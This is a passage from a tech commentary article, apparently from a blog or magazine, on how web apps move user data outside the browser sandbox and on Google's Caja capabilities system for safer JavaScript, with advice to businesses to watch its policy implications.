Web Apps Make Things Worse
Problem solved? Not quite. Remember the original intent of the sandbox was to keep a malicious script from wreaking havoc on the local machine, which includes stealing, destroying or modifying the user's valuable data. We've just saved a piece of user data from the rising tide, but by putting it outside that original security perimeter. Now it's over on someone's server cluster. And what one script has done, another can undo. Specifically, if the browser (or its user) can be fooled into executing a malicious script within a live window, it can read, destroy or alter that data as if it were the user. Now you've got some idea why (for instance) e-mails read within a Web mail interface typically have their embedded scripts disabled. All it would take is the wrong spam or phishing mail opened in the browser window, and your GMail or Yahoo account could be toast.
So What's Caja?
What's It All Mean?
That's important in itself, but a second and perhaps more interesting problem comes from the utilization of the Caja's capabilities system. Capabilities is a more powerful concept than the sandbox, and like most powerful tools it can also be dangerous. Deciding what 'magic words' to allow in a particular setting, and who gets to say them, could become arcane and confusing, particularly if you are trying to push the edge in allowing collaborating applications.
The usual recourse in the face of such complexity is to come up with well-known and safe patterns of application. That seems the likely result here as well: The capabilities frameworks implemented from (for instance) OpenSocial compliant sites aren't going to be open-ended, they will be particular to that site or class of applications. So while the Caja mechanism will present one set of issues, the definition of actual policies for its use will create another. It may constrain or expand the horizons for those who program or build business plans within the scope of the Google, MySpace, Yahoo and probably other platforms. So if you're playing in this area, make sure the technical side of the shop is watching Caja. The Caja spec is here, and there's a good starter pitch here. Then invest some time in discussing what issues or opportunities may arise if it takes off.